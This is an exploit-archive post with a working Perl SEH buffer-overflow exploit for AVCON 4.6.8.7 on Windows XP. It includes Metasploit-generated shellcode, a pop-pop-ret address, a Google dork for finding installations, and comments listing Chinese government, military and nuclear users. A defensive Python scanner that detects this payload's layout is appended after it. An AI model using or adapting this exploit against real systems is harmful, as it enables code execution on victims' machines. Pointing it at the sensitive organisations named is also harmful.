AVCON Buffer Overflow
Posted on 07 May 2010
=====================
AVCON Buffer Overflow
=====================

#!/usr/bin/perl
# Exploit Title: AVCON Buffer Overflow
# Date: 5/7/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Version: 4.6.8.7
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Dork: site:gov.cn "AVCON"
# There are other bugs... This is just for fun ;-)
# Paste the output from exploit.txt into AVH323GW.exe
# Enjoy the wang chung++ and look for the other bugs. ;)
# 2 products from China and 2 0days in one month dizam!
# Okay so who uses AVCON4 and why is it so important?
# China's State Grid
# China's State Information Center
# China's Customs armed police
# China's Shenyang Military Region
# China's Yunnan Frontier Corps
# China's Nuclear Agencies
# China Life Insurance Company
# China Pacific Insurance Group
# China National Petroleum Corporation
# Daqing Oilfield Material Group
# Grace Pai Henan Electric Power
# China Civil Aviation Information Group
# China Southern Airlines Co., Ltd.
# Shenzhen International Trust
# National Grain and Oil Information Center
# Anyang City of Henan Province E
# Guangdong Food and Drug Administration
## EDB Test Notes:
## Software can be installed as English. Once installed, go to "Start" -> "AVCON4" ->
## run "AVH323GW.exe", copy and paste the exploit (string) to the input field (there's only one),
## and click on "call".

use strict;
use warnings;

my $exploit = "poc.txt";
my $junk    = "\x41" x 1019;                # filler up to the SEH record
my $nSEH    = "\xeb\x06\x90\x90";           # jmp 6 bytes
my $SEH     = pack('V', 0x200504B4);        # pop pop ret
# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
    "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4" .
    "\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2" .
    "\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29" .
    "\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee" .
    "\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c" .
    "\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6" .
    "\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47" .
    "\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf" .
    "\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99" .
    "\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3" .
    "\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22" .
    "\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3" .
    "\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae" .
    "\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4" .
    "\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b" .
    "\x97\x2d\x30\x18\xa5\xbe\x86\x7b";
my $padding = "\x90" x 5000;                # padding
my $payload = $junk . $nSEH . $SEH . $buf . $padding;

open(my $fh, '>', $exploit) or die "Cannot open $exploit: $!";
binmode($fh);                               # write raw bytes, no newline translation
print $fh $payload;
close($fh);

# Inj3ct0r.com [2010-05-07]
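A defender's counterpart to the script above, added here as an example that is not part of the original listing: a Python heuristic that flags a captured input laid out like this payload (a long single-byte run, a NOP sled, and a short JMP followed by a handler address at the SEH offset). The 1019-byte offset and the 0x200504B4 address come from the script; the sample buffer and its 0xCC stand-in for the shellcode are constructed here.

```python
"""Heuristic scanner for SEH-overwrite style inputs.

Constructed example, not part of the original listing.  The 1019-byte filler
length and the handler address 0x200504B4 are taken from the script above; the
sample buffer below uses 0xCC (INT3) as a stand-in for the shellcode."""
from __future__ import annotations

SEH_OFFSET = 1019   # filler length before the nSEH/SEH pair in the script above


def longest_run(data: bytes) -> tuple[int, int]:
    """Return (byte_value, run_length) for the longest run of one repeated byte."""
    best_b, best_n, cur_b, cur_n = 0, 0, None, 0
    for b in data:
        cur_n = cur_n + 1 if b == cur_b else 1
        cur_b = b
        if cur_n > best_n:
            best_b, best_n = b, cur_n
    return best_b, best_n


def seh_record_at(data: bytes, offset: int) -> dict | None:
    """Check whether data[offset:offset+8] looks like an overwritten SEH record:
    a short JMP (0xEB rel8) in the nSEH slot, then a little-endian handler address."""
    rec = data[offset:offset + 8]
    if len(rec) < 8 or rec[0] != 0xEB:
        return None
    return {"jmp_rel8": rec[1], "handler": int.from_bytes(rec[4:8], "little")}


def scan_input(data: bytes, seh_offset: int = SEH_OFFSET) -> list[str]:
    """Return findings for one captured input; an empty list means nothing matched."""
    findings = []
    b, n = longest_run(data)
    if n >= 256:                                   # long single-byte run (filler or sled)
        findings.append(f"single-byte run: 0x{b:02x} x {n}")
    if b"\x90" * 32 in data:                       # NOP sled
        findings.append("NOP sled (>= 32 x 0x90)")
    rec = seh_record_at(data, seh_offset)
    if rec is not None:
        findings.append(f"SEH overwrite: jmp +{rec['jmp_rel8']} -> handler 0x{rec['handler']:08x}")
    return findings


def build_sample() -> bytes:
    """Constructed sample laid out like the script's payload, with INT3s instead of shellcode."""
    return (b"\x41" * SEH_OFFSET + b"\xeb\x06\x90\x90" + (0x200504B4).to_bytes(4, "little")
            + b"\xcc" * 218 + b"\x90" * 5000)


if __name__ == "__main__":
    for line in scan_input(build_sample()):
        print(line)
```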